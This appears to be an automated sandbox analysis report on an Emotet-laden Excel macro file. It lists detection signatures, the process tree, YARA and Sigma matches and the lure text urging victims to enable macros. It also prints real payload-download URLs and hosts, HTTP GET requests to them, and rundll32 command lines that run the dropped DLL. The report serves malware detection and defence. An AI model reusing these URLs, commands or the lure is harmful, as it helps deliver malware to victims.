Play interactive tour

Edit tour

Windows Analysis Report DOC-0212.xlsm

Overview

General Information

Sample Name:	DOC-0212.xlsm
Analysis ID:	532596
MD5:	aa4f296ed678b18394a365861777241c
SHA1:	cedfd0d995958b8550f36d037c732854e23c68c5
SHA256:	20d3da22e72baf1a0e865621f9bb0af55998db0c4c534e847f30a084113eec8c
Tags:	xlsm
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Sigma detected: Emotet RunDLL32 Process Creation

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Yara detected Xls With Macro 4.0

Drops PE files to the user directory

Excel documents contains an embedded macro which executes code when the document is opened

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1612 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

rundll32.exe (PID: 2684 cmdline: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889 MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1500 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2948 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy MD5: 51138BEEA3E2C21EC44D0932C71762A8)

svchost.exe (PID: 2800 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.2ab960.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2ab960.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2ab960.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.2ab960.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.1ec0000.7.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.1ec0000.7.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.1ec0000.7.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.rundll32.exe.1ec0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2684, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL, ProcessId: 1500

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1612, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889, ProcessId: 2684

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:	Avira URL Cloud: Label: malware
Source: http://www.duoyuhudong.cn/wp-content/we8xi/	Avira URL Cloud: Label: malware

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E450927 FindFirstFileExW,

3_2_6E450927

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: VZZdgPFp2xiOJtfpv[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

DNS query: name: sadabahar.com.np

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 194.233.67.242:80

Source: global traffic	HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.4.25content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://sadabahar.com.np/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Thu, 02 Dec 2021 13:31:35 GMTserver: LiteSpeedData Raw: 31 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 5b ff 73 db 36 b2 ff d9 fe 2b 60 7a 6a 8b 2d 49 51 92 65 59 94 e5 de 35 4d e7 fd d0 5e 6f 9a 76 de bc 49 f2 3c 10 09 51 48 28 80 0f 80 64 fb 14 fd ef 37 0b 90 14 bf c9 56 9c a4 b9 99 d7 78 1c 93 c0 62 b1 58 2c b0 9f 5d 80 d7 27 3f fe fa e2 f7 ff f9 e7 4b b4 50 cb e4 e6 f8 1a fe a0 04 b3 78 6a 11 e6 fe f1 ca ba 39 3e be 5e 10 1c dd 1c 1f 5d 2f 89 c2 28 5c 60 21 89 9a 5a 7f fc fe 93 7b 65 15 e5 0c 2f c9 d4 5a 53 72 97 72 a1 2c 14 72 a6 08 53 53 eb 8e 46 6a 31 8d c8 9a 86 c4 d5 2f 0e a2 8c 2a 8a 13 57 86 38 21 d3 9e 83 96 94 d1 e5 6a 99 17 68 b6 09 65 ef 91 20 c9 d4 4a 05 9f d3 84 58 68 21 c8 7c 6a 2d 94 4a 83 6e 37 5e a6 b1 c7 45 dc bd 9f b3 6e af 07 6d 8e ae 15 55 09 b9 f9 27 8e 09 62 5c a1 39 5f b1 08 9d 9d 5e f5 7b bd 09 7a 85 23 3c c3 0b 2c d0 2f ab 44 51 f4 82 33 a9 c4 2a 54 94 b3 eb ae 69 7a 6c 86 a9 87 73 2e f8 8c 2b 79 5e 0c e6 7c 89 ef 5d ba c4 31 71 53 41 60 b0 41 82 45 4c ce 51 f7 e6 f8 ba 10 f8 3c 62 12 08 e6 44 85 8b 73 23 f5 79 b7 3b e7 4c 49 2f e6 3c 4e 08 4e a9 f4 42 be 3c ac a5 f4 ee 60 a4 35 62 0b 27 8a 08 86 15 b1 90 7a 48 c9 d4 c2 69 9a d0 10 c3 78 ba 42 ca ef ee 97 89 85 f4 b8 a6 d6 63 83 47 67 02 ff df 8a 4f d0 4f 84 44 65 35 cb a0 db 95 b9 d6 40 5e 8f a5 dd 39 21 51 d7 aa 0e f9 0b c8 f2 82 2f 97 84 29 79 98 50 61 46 5d 92 ee e8 e8 5a 86 82 a6 2a d3 8e 22 f7 aa fb 0e af b1 29 d5 06 73 74 47 59 c4 ef bc db bb 94 2c f9 3b fa 8a 28 45 59 2c d1 14 6d ac 19 96 e4 0f 91 58 81 36 39 19 bc e9 be e9 66 53 f1 a6 ab cd 40 be e9 86 5c 90 37 5d dd f8 4d b7 37 f0 7a 9e ff a6 3b ea df 8f fa 6f ba 96 63 91 7b 65 05 96 97 b2 d8 72 2c b9 8e 9f c7 4f ae 63 cd 4d ae e3 97 86 a1 5c 6b 86 7c 25 42 62 05 1b 2b e4 2c c4 4a 8b 91 c9 6b c4 ad 4d de 9b ee 5d ea 52 16 26 ab 88 c8 37 dd 77 52 17 e8 66 ae 20 09 c1 92 78 4b ca bc 77 f2 fb 35 11 d3 a1 77 e5 f5 ad ed 76 72 7c 74 74 74 32 5f 31 bd 56 3a c4 c1 8e b2 37 6b 2c 10 73 84 c3 1d 3a c5 5e 28 08 56 e4 65 42 60 d6 3a 56 88 d9 1a 4b cb 76 d2 29 f5 62 a2 5e c0 86 70 af ce ce ca 6f 1d ab 1f 59 f6 24 67 8c 64 87 e4 8c f1 f4 95 12 94 c5 de 5c f0 e5 8b 05 16 2f 78 44 26 a9 17 26 04 8b df 48 a8 3a be e3 3b d4 33 5b 0a f5 16 84 c6 0b 65 3b a9 37 a7 49 f2 3b b9 57 1d ec c1 82 78 e8 a8 05 95 0e b1 1d df f1 ed 09 99 52 4f f1 1f b1 c2 7f fc f6 73 c7 9e 08 a2 56 82 a1 e7 33 56 86 b1 43 a6 d3 2a eb 6d 31 ac b0 43 8c b6 54 53 4f 99 31 da 13 e5 49 11 4e 89 a3 bc 88 cc 89 98 2a cf 2c ea ba d9 3a 18 d4 99 e9 59 fe f0 f0 3b 8e ff 81 97 a4 63 c1 3e 6d d9 af fd b7 30 6c c2 a2 17 0b 9a 44 1d 65 6f e7 5c 74 f8 f4 ef 42 e0 87

Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma/3 equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.753340803.00000000058F9000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.c
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.co
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.n
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/w
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-i
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-inc
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-inclu
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-include%http://sadabahar.com.np/wp-includes/p
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUM)http://sadabahar.com.np/wp-includes/pUMqI
Source: EXCEL.EXE, 00000000.00000002.754587986.0000000006CCA000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITC-http://sadabahar.com.np/wp-includes/pUMqITCt8/http://sad
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/A
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://sadabahar.com.np/wp-includes/pUMqITCt83a/J
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.755705830.00000000076B6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
Source: EXCEL.EXE, 00000000.00000002.755597197.0000000007156000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.755761363.00000000077A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.755747208.0000000007776000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000006.00000002.694740490.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.753115851.0000000005830000.00000004.00000001.sdmp	String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/
Source: EXCEL.EXE, 00000000.00000002.747914705.000000000046C000.00000004.00000020.sdmp	String found in binary or memory: http://www.duoyuhudong.cn/wp-content/we8xi/vvC:
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.752793824.0000000005077000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.556804981.0000000001C67000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694499141.0000000001FC7000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.748132714.0000000002357000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E8FA61E5.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: sadabahar.com.np

Source: global traffic	HTTP traffic detected: GET /wp-includes/pUMqITCt83a/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadabahar.com.npConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-content/we8xi/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.duoyuhudong.cnConnection: Keep-Alive

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2ab960.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.558061657.0000000001EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.555217971.000000000029D000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 4	Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 4	Screenshot OCR: Enable Content" button 6 7 8 9 ,, G' 11 12 13 14 15 16 17 18 ^
Source: Screenshot number: 8	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
Source: Screenshot number: 8	Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
Source: Screenshot number: 8	Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 17 18 ^
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" button
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" button

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\besta.ocx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6753	0_2_025E6753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6743	0_2_025E6743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E6340	0_2_025E6340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E66F3	0_2_025E66F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Code function: 0_2_025E66E8	0_2_025E66E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE1291	3_2_01EE1291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDEA55	3_2_01EDEA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDEDED	3_2_01EDEDED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC51EC	3_2_01EC51EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA3E7	3_2_01ECA3E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC19C0	3_2_01EC19C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC75D2	3_2_01EC75D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDDDA5	3_2_01EDDDA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0BA4	3_2_01ED0BA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE5A7	3_2_01EDE5A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED89A2	3_2_01ED89A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC43BE	3_2_01EC43BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC59BF	3_2_01EC59BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDD7BE	3_2_01EDD7BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED85B8	3_2_01ED85B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE3B5	3_2_01EDE3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC358B	3_2_01EC358B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDDB87	3_2_01EDDB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC8D80	3_2_01EC8D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC4B81	3_2_01EC4B81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3782	3_2_01ED3782
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC7795	3_2_01EC7795
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED1591	3_2_01ED1591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECB191	3_2_01ECB191
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCF6E	3_2_01ECCF6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECBD61	3_2_01ECBD61
